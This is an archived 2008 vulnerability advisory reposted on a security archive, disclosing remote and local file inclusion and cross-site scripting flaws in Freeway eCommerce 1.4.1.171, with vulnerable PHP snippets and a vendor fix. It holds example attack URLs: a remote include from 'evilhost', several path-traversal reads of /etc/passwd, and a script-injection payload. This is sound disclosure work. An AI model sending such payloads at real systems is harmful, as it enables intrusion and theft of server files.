what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DSECRG-08-036.txt

DSECRG-08-036.txt
Posted Aug 19, 2008
Authored by Digital Security Research Group | Site dsecrg.com

Freeway eCommerce version 1.4.1.171 suffers from remote file inclusion, multiple local file inclusion, and cross site scripting vulnerabilities.

tags | exploit, remote, local, vulnerability, xss, file inclusion
SHA-256 | edd06b331501553efabc0fb143a64cf09d5253d9fe025cf029f82fcafd4326e8

DSECRG-08-036.txt

Change Mirror Download

Digital Security Research Group [DSecRG] Advisory #DSECRG-08-036


Application: Freeway eCommerce
Versions Affected: 1.4.1.171
Vendor URL: http://www.openfreeway.org/
Bugs: RFI, Multiple LFI, XSS
Exploits: YES
Reported: 27.06.2008
Second report: 04.07.2008
Vendor response: 06.07.2008
Solution: YES
Date of Public Advisory: 18.08.2008
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Freeway eCommerce system has multiple security vulnerabilities:

1. Multiple Remote/Local File Include
2. Linked XSS vulnerability


Details
*******

1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities.

1.1 Remote File Include vulnerability found in script admin/create_order_new.php

Vulnerable GET parameter "include_page".

Code
****
#################################################

...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

if($command!="")
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...

#################################################

Example:

http://[server]/[installdir]/admin/create_order_new.php?command=include_page&include_page=http://evilhost/info.php


1.2 Local File Include vulnerability found in script includes/events_application_top.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL);

#################################################

Example:

http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00


1.3 Local File Include vulnerabilities found in scripts

includes/languages/english/account.php
includes/languages/french/account.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . "/events_account.php");

#################################################

Example:

http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00


1.4 Local File Include vulnerability found in script includes/languages/french/account_newsletters.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . "/events_account_newsletters.php");

#################################################

Example:

http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00


1.5 Local File Include vulnerability found in script includes/modules/faqdesk/faqdesk_article_require.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE);

#################################################

Example:

http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00


1.6 Local File Include vulnerability found in script includes/modules/newsdesk/newsdesk_article_require.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

//require('includes/application_top.php');
require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE);

#################################################

Example:

http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00


1.7 Local File Include vulnerability found in script templates/Freeway/boxes/card1.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/cards1_box.php');

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00


1.8 Local File Include vulnerability found in script templates/Freeway/boxes/loginbox.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/loginbox.php');

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/boxes/loginbox.php?language=../../../../../../../../../../../../../etc/passwd%00


1.9 Local File Include vulnerability found in script templates/Freeway/boxes/whos_online.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

require(DIR_WS_LANGUAGES . $language . '/whos_onlinebox.php');

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/boxes/whos_online.php?language=../../../../../../../../../../../../../etc/passwd%00


1.10 Local File Include vulnerability found in script templates/Freeway/mainpage_modules/mainpage.php

Successful exploitation requires that "register_globals" is enabled.

Code
****
#################################################

include(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFINE_MAINPAGE);

#################################################

Example:

http://[server]/[installdir]/templates/Freeway/mainpage_modules/mainpage.php?language=../../../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------


2. Linked XSS vulnerability found in script admin/search_links.php

GET parameter "search_link"

Example:

http://[server]/[installdir]/admin/search_links.php?search_link="<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>



Solution
********

Vendor fix this flaw on 13.08.2008. New version of Freeway 1.4.2.197 [Sathish] can be download here:

http://www.openfreeway.org/download.html

Change Log:

http://www.openfreeway.org/download/change-log.html



About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.


Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close